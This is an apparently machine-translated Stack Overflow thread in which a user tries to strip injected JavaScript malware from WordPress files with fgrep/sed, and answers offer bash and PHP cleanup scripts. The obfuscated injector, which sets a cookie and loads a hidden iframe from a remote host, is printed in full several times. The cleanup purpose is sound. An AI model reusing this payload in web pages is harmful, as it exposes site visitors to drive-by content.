如何使用 fgrep 递归删除目录中的字符串sed答案

【问题标题】：How to remove a string in a directory recursively using fgrep | sed如何使用 fgrep 递归删除目录中的字符串sed
【发布时间】：2023-04-02 05:50:02
【问题描述】：

我有 shell 脚本：

#! /bin/bash

clear

SEARCH='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/'

REPLACE=""

fgrep -rl $SEARCH . | xargs sed -i 's/$SEARCH/$REPLACE/g'

fgrep -rl $SEARCH .

echo "Finished replacements"

我想做的是搜索一个字符串，这实际上是恶意软件代码，然后使用 fgrep 和 sed 将其删除。我知道 fgrep -rl $SEARCH 有效，并返回包含该字符串的所有文件。但它也返回 shell 脚本。这是一个列表，其中包含一些与搜索条件匹配的文件。

./wp-includes/js/heartbeat.min.js
./wp-includes/js/crop/cropper.js
./wp-includes/js/thickbox/thickbox.js
./wp-includes/js/admin-bar.min.js
./findandreplace.sh

另一件事是 sed 部分有问题，因为它返回一些错误：

grep: var: No such file or directory
grep: _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28: No such file or directory
grep: \x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E: No such file or directory
grep: \x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62: No such file or directory
grep: \x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A: No such file or directory
grep: \x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E: No such file or directory
grep: \x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function: No such file or directory
grep: _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var: No such file or directory
grep: _0x10b1x5=: No such file or directory
grep: new: No such file or directory
grep: Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&: No such file or directory
grep: &_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else: No such file or directory
grep: {return: No such file or directory
grep: false};}function: No such file or directory
grep: _0x10b1x6(_0x10b1x2){var: No such file or directory
grep: _0x10b1x3=: No such file or directory
grep: new: No such file or directory
grep: RegExp(_0x10b1x2+_0xf19b[8]);var: No such file or directory
grep: _0x10b1x4=_0x: No such file or directory
grep: 10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else: No such file or directory
grep: {return: No such file or directory
grep: false};return: No such file or directory
grep: _0x10b1x4[1]?_0x10b1x4[1]:false;}var: No such file or directory
grep: _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_: No such file or directory
grep: 0xf19b[11],_0xf19b[12],1);var: No such file or directory
grep: _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var: No such file or directory
grep: _0x10b1x9=1380;var: No such file or directory
grep: _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1: No such file or directory
grep: 0b1x8);};};: No such file or directory
grep: /*236499a9e0b11c0dc3eecf5cf751a097*/: No such file or directory
grep: var: No such file or directory
grep: _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28: No such file or directory
grep: \x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E: No such file or directory
grep: \x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62: No such file or directory
grep: \x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A: No such file or directory
grep: \x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E: No such file or directory
grep: \x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function: No such file or directory
grep: _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var: No such file or directory
grep: _0x10b1x5=: No such file or directory
grep: new: No such file or directory
grep: Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&: No such file or directory
grep: &_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else: No such file or directory
grep: {return: No such file or directory
grep: false};}function: No such file or directory
grep: _0x10b1x6(_0x10b1x2){var: No such file or directory
grep: _0x10b1x3=: No such file or directory
grep: new: No such file or directory
grep: RegExp(_0x10b1x2+_0xf19b[8]);var: No such file or directory
grep: _0x10b1x4=_0x: No such file or directory
grep: 10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else: No such file or directory
grep: {return: No such file or directory
grep: false};return: No such file or directory
grep: _0x10b1x4[1]?_0x10b1x4[1]:false;}var: No such file or directory
grep: _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_: No such file or directory
grep: 0xf19b[11],_0xf19b[12],1);var: No such file or directory
grep: _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var: No such file or directory
grep: _0x10b1x9=1380;var: No such file or directory
grep: _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1: No such file or directory
grep: 0b1x8);};};: No such file or directory
grep: /*236499a9e0b11c0dc3eecf5cf751a097*/: No such file or directory

在此之后，脚本被修改：

fgrep -rl $REPLACE . | xargs sed -i 's/$REPLACE/$REPLACE/g'

fgrep -rl $REPLACE .

所以实际上有3个问题：

脚本与搜索条件匹配（如何排除它？）。
如何正确使用 grep 和 sed。
我猜是脚本自己修改了。

希望我已经足够清楚了。谢谢=)

【问题讨论】：

标签： bash sed grep

【解决方案1】：

也许以这种方式更改脚本会对您有所帮助，

for i in $(fgrep -rl --exclude='*.sh' $REPLACE .); do sed -i "s|${SEARCH}|${REPLACE}|g" "$i"; done;

这里我使用--exclude从目标搜索中排除shell脚本，然后在for循环中运行它，这样我们就可以捕获每个文件名并替换搜索到的材料。

【讨论】：

你能从搜索中排除 $0 吗？
我不明白你@miken32 你从搜索中排除 $0 是什么意思？？
$0 是指脚本的名称，所以排除它而不是所有 *.sh 文件。
不走运，这就是我得到的： grep: var: 没有这样的文件或目录 grep: _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\ x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D", "\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","" ,"\x3D\x28: No such file or directory "some other stuff"
还有这个 : grep: /*236499a9e0b11c0dc3eecf5cf751a097*/: 没有这样的文件或目录 sed: -e expression #1, char 38: unterminated s' command sed: -e expression #1, char 38: unterminated s' command sed: -e expression #1, char 38: 未终止的 `s' 命令

【解决方案2】：

因此，这将非常复杂，因为您的搜索文本除了包含多行之外，还包含正则表达式中的特殊字符（例如*）以及引号。如果您从哲学上不致力于使用 bash 和 sed，那么以下方法会起作用：

#! /usr/bin/php
<?php
$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $filecontents = file_get_contents($file);
        $filecontents = str_replace($searchpattern, "", $filecontents);
        file_put_contents($file, $filecontents);
    }
}

【讨论】：

错误：sh：-c：第 6 行：意外标记附近的语法错误 (' sh: -c: line 6: \x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79" ];窗口[_0xf19b[0]]=函数(){函数_0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5=新日期();_0x10b1x5[_0xf19b[2]](_0x10b1x1x5[ ]]()+_0x10b1x4);};if(_0x10b1x2&'
对我来说效果很好。你有什么版本的PHP？
我更改了版本，但没有任何反应。 php56
这就是我所拥有的：escaped_search = escapeshellarg($searchpattern); $cmd = "grep -Frl $escaped_search .";执行（$cmd，$文件）； $iter = 0; foreach ($files as $file) { if (basename($file) !== basename(FILE)) { $iter++; $filecontents = file_get_contents($file); $filecontents = str_replace($searchpattern, "", $filecontents); file_put_contents($file, $filecontents); } } print("for count: $iter") 。 PHP_EOL； $count = exec("fgrep -lr $escaped_search . | wc -l");打印（“计数：$count”）。 PHP_EOL;

【解决方案3】：

好吧，在@miken32 的回答之后，由于我更熟悉 php，所以我最终得到了这个：

#! /opt/php56/bin/php
<?php

$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

$iter = 0;

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $iter++;
        $filecontents = file_get_contents($file);
        $filecontents = preg_replace("/(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)/", '', $filecontents);      
        file_put_contents($file, $filecontents);
    }
}

print("for count: $iter") . PHP_EOL;

$count = exec("fgrep -lr $escaped_search . | wc -l");

print("grep count: $count") . PHP_EOL;

我认为 grep 部分也可以使用正则表达式进行优化，像这样：

fgrep -rl '(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)' .

但我不敢尝试，所以我不确定。

从这种恶意软件中恢复的更好方法是使用备份，但在我的情况下这是不可能的，所以我选择了搜索/替换策略。

感谢大家的帮助！！

【讨论】：